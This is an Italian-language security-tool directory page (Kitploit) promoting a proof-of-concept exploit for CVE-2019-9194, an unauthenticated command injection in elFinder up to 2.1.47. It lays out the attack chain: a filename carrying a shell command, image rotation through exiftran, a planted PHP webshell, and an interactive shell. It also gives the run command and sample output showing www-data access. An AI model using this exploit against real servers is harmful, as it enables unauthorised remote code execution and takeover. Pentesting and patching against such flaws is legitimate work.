Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-9194-elFinder-Command-Injection-PoC — Vulnerabilità di iniezione di comandi in elFinder <= 2.1.47 tramite il componente PHP connector. Consente l'esecuzione remota di codice non autenticata come utente del server web. | Kitploit
Strumenti/GitHubGitHub/estebanzarate/cve-2019-9194-elfinder-command-injection-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubestebanzarate/cve-2019-9194-elfinder-command-injection-poc

CVE-2019-9194-elFinder-Command-Injection-PoC

Vulnerabilità di iniezione di comandi in elFinder <= 2.1.47 tramite il componente PHP connector. Consente l'esecuzione remota di codice non autenticata come utente del server web.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
226 mesi faNon ancora revisionato
Condividi

CVE-2019-9194 — Iniezione di comandi in elFinder (PoC)

Vulnerabilità di iniezione di comandi in elFinder <= 2.1.47 tramite il componente connettore PHP. Consente l'esecuzione remota di codice non autenticata come utente del server web.

Come funziona

  • Carica un JPEG valido con un nome file malevolo contenente un comando shell.
  • Attiva la vulnerabilità richiedendo una rotazione dell'immagine, che passa il nome file a exiftran senza sanificazione.
  • Il comando iniettato scrive una webshell PHP (SecSignal.php) sul server.
  • Si connette alla webshell e apre una shell interattiva.

Requisiti

  • Python 3
  • libreria requests (pip install requests)
  • Il target deve avere exiftran installato e il connettore PHP elFinder abilitato (connector.minimal.php)

Utilizzo

root@kitploit:~
python3 exploit.py http://TARGET

Esempio:

root@kitploit:~
$ python3 exploit.py http://10.10.10.10/elFinder
[*] Uploading malicious image...
[*] File uploaded, hash: l1_U2VjU2lnbmFsLmpwZw
[*] Triggering command injection via image rotation...
[*] Checking for webshell...
[+] Pwned!
[+] Interactive shell (Ctrl+C to exit)

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Riferimenti

  • CVE-2019-9194
  • EDB-46481
  • Vulnerability writeup — SecSignal
  • elFinder 2.1.48 release (fix)

Crediti

  • Discovery: Thomas Chauchefoin
  • Original exploit: @q3rv0
  • Python 3 port & Metasploit-style improvements: Esteban Zárate
Scarica lo strumento